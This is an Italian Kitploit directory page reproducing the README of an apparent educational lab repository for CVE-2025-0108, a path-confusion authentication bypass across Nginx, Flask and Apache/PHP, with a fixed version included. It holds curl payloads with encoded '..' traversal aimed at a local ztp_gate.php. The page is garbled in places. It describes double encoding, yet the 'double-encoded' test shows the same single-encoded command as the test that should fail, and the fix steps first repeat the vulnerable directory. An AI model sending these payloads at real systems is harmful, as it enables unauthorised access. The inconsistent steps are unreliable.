Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/kso4more/cve-2025-0108
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebAutenticazioneConfigurazione ErrataApprendimento e FormazioneLab e Pratica
GitHubkso4more/cve-2025-0108

CVE-2025-0108

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-0108 — Sicurezza Web (PoC & Fix)

Questa repository contiene un piccolo ambiente di laboratorio per riprodurre e mitigare il problema CVE-2025-0108 (confusione del percorso / header smuggling tra Nginx e Apache).
L'obiettivo dell'esercizio è dimostrare come le richieste con doppia codifica possano aggirare l'autenticazione in uno stack multilivello (Nginx -> backend Flask -> Apache/PHP) e mostrare una mitigazione lato backend.

Questo ambiente è esclusivamente a scopo didattico.

Contenuti

  • CVE-2025-0108/ — implementazione vulnerabile (PoC)
  • CVE-2025-0108_fix/ — implementazione corretta (il backend verifica il percorso decodificato)

PoC (vulnerabile) — CVE-2025-0108

Scopo

Simulare la configurazione vulnerabile in cui un percorso con doppia codifica può aggirare l'autenticazione a causa della decodifica incoerente del percorso tra i vari livelli.

Avviare l'ambiente

Dalla directory CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

Test

Esegui questi comandi curl dal tuo host:

Test 1 — doppia codifica (atteso: HTTP 200)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Questa richiesta utilizza la doppia codifica (%252e%252e == %2e%2e == ..) e dimostra il bypass nella configurazione vulnerabile. Dovrebbe restituire 200 OK.

Test 2 — codifica singola (atteso: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Test 3 — percorso non codificato con .. (atteso: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

Ferma gli ambienti:

root@kitploit:~
docker compose down

Versione corretta — CVE-2025-0108_fix

Il backend esegue un controllo aggiuntivo sul percorso decodificato prima di consentire l'accesso. Questo impedisce il bypass dell'autenticazione quando le richieste presentano una doppia codifica.

Dalla directory CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

Test

Esegui questi comandi curl dal tuo host:

Dalla directory CVE-2025-0108_fix:

root@kitploit:~
cd CVE-2025-0108_fix
docker compose up --build

Test 1 — doppia codifica (atteso: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Il backend corretto rileva il .. decodificato e restituisce 401 Non autorizzato.

Test 2 — codifica singola (atteso: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Test 3 — percorso non codificato con .. (atteso: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

Ferma gli ambienti:

root@kitploit:~
docker compose down
Scarica lo strumento